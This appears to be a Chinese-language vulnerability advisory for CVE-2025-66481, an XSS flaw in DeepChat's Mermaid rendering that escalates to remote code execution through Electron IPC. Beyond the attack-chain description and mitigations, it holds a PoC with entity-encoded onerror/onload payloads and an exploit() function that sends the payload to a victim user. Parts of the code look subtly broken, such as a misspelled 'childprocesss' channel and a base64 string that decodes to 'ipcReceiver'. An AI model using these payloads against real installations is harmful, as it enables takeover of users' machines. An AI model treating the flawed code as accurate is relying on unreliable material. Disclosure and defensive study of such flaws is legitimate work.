CVE-2025-66481 DeepChat Mermaid XSS绕过导致远程代码执行漏洞

漏洞信息

漏洞编号

CVE-2025-66481

漏洞类型

XSS跨站脚本攻击/远程代码执行

CVSS评分

9.6 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

DeepChat

漏洞概述

CVE-2025-66481是DeepChat开源AI聊天平台中存在的一个严重安全漏洞，CVSS评分高达9.6分。该漏洞影响DeepChat 0.5.1及以下版本，源于Mermaid内容渲染时输入过滤不完整。攻击者可通过构造特制的Mermaid图表内容，利用未加引号的HTML属性结合HTML实体编码绕过现有安全补丁，在受害者浏览器中执行任意JavaScript代码。由于DeepChat基于Electron框架构建，攻击者可进一步利用electron.ipcRenderer接口实现远程代码执行，完全控制受害者主机。此漏洞无需认证即可利用，但需要用户交互（点击或查看恶意消息），攻击者可窃取敏感信息、安装恶意软件或建立持久化后门。截至披露时，官方尚未发布修复版本。

技术细节

漏洞根源在于DeepChat的MermaidArtifact.vue组件对Mermaid图表内容的净化不充分。虽然开发者已针对Mermaid XSS漏洞进行过安全修复，但该补丁可通过HTML属性注入技术轻易绕过。具体而言，攻击者利用HTML实体编码（如&colon;、(等）配合未加引号的HTML属性值，构造能够逃逸当前正则过滤器的恶意载荷。当受害者查看包含恶意Mermaid代码的消息时，浏览器会解析这些特制的SVG/HTML内容，触发XSS执行。在Electron环境中，JavaScript可通过window.require('electron').ipcRenderer访问原生API，攻击者利用此通道可向主进程发送任意IPC消息，触发文件操作、网络请求甚至命令执行。关键问题在于Mermaid渲染器生成的SVG元素允许事件处理器属性（如onload、onerror）存在，且HTML净化逻辑未正确处理所有编码变体。

攻击链分析

STEP 1

1

攻击者创建恶意Mermaid图表内容，利用HTML实体编码和未加引号的属性值绕过XSS过滤器

STEP 2

2

攻击者通过DeepChat消息接口向目标用户发送包含恶意载荷的消息

STEP 3

3

目标用户查看消息时，DeepChat的MermaidArtifact.vue组件渲染图表内容

STEP 4

4

浏览器解析特制的SVG/HTML，触发XSS漏洞，执行注入的JavaScript代码

STEP 5

5

恶意代码通过window.require('electron').ipcRenderer访问Electron IPC接口

STEP 6

6

攻击者向主进程发送任意IPC消息，触发child_process模块执行系统命令

STEP 7

7

实现远程代码执行，完全控制受害者主机，可窃取数据、安装后门或横向移动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-66481 PoC - DeepChat Mermaid XSS to RCE
// Target: DeepChat <= 0.5.1 (Electron app)

const maliciousMermaidPayload = `
flowchart TD
    A[<img src=x onerror=
    &#99;onst&#32;ipc&#61;window&#46;require&#40;&#39;electron&#39;&#41;&#46;ipcRenderer&#59;
    ipc&#46;send&#40;&#39;&#99;hild&#112;roc&#101;sss&#46;&#101;x&#101;&#99;&#39;,&#123;&#99;md&#58;&#39;calc&#101;x&#101;&#39;&#125;&#41;>
    A-->B
`;

// Alternative bypass using unquoted attributes with entity encoding:
const bypassPayload = `
flowchart LR
    A[<svg onload=
    &#101;val(atob('aXBjPXdpbmRvdy5yZXF1aXJlKCdlbGVjdHJvbicpLmlwY1JlY2VpdmVy'))>
    A-->B
`;

// Send via DeepChat message interface
async function exploit(targetUserId) {
    const response = await fetch('/api/chat/send', {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify({
            to: targetUserId,
            type: 'mermaid',
            content: maliciousMermaidPayload
        })
    });
    return response.json();
}

exploit('victim_user_id');

// RCE via IPC - requires user interaction to trigger Mermaid render
// After XSS execution, attacker can:
// 1. Access electron.ipcRenderer
// 2. Send arbitrary messages to main process
// 3. Execute system commands via child_process.exec
// 4. Read/write files, exfiltrate data, establish persistence

影响范围

DeepChat <= 0.5.1

防御指南

临时缓解措施

由于官方尚未发布修复版本，建议采取以下临时措施：1）禁用或限制Mermaid图表功能；2）在Web应用层实施输入白名单验证；3）启用严格的Content Security Policy；4）对Electron应用启用contextIsolation并禁用nodeIntegration；5）提醒用户不要点击来源不明的消息链接；6）考虑使用沙箱环境隔离渲染进程。